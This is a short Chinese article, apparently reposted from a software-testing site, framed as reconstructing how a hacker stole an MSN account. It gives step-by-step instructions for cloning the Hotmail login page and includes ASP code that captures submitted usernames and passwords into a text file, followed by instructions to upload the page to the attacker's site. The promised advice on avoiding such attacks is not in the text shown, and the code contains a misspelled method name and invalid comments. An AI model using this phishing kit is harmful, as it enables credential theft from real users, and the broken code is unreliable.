今天我們來看一個具體的實例,并介紹如何避免遭受跨站攻擊。
“跨站入侵”罪案還原:跨站入侵MSN盜號
我們根據網友提供的線索,對他的MSN賬號的丟失進行罪案還原,并推理黑客是如何盜取他的MSN賬號的。
第一步:黑客先要制作一個和Hotmail登錄界面一樣的偽造網頁。登錄Hotmail的官方網站,然后點擊菜單欄中的“文件”,在彈出的下拉菜單中選擇“另存為”,將網頁保存下來。然后使用Dreamweaver 等網頁編輯程序打開保存下來的網頁(圖1),找到輸入用戶名和密碼的位置,加入下面這段用戶名和密碼的竊取代碼:
圖1
<%
bbsuser =request("bbsuser ")
bbspwd =request("bbspwd ")
set fs=server.CreateObject("Scripting.FileSystemObject")
//開啟文件服務
set file=fs.OpenTaxtFile(server.MapPath("Hotmail.txt"),8,True)
//創建打開"Hotmail.txt"
file.writeline bbsuser +"----"+ bbspwd
//將獲得的用戶名密碼寫入"Hotmail.txt"
file.close
set file=nothing
set fs=nothing
%>
然后將Hotmail原頁面中的本地鏈接地址和相關參數修改,讓圖片都能夠正常顯示,最后將該網頁另存為“index.asp”并上傳到黑客自己的網站。
文章來源于領測軟件測試網 http://www.kjueaiud.com/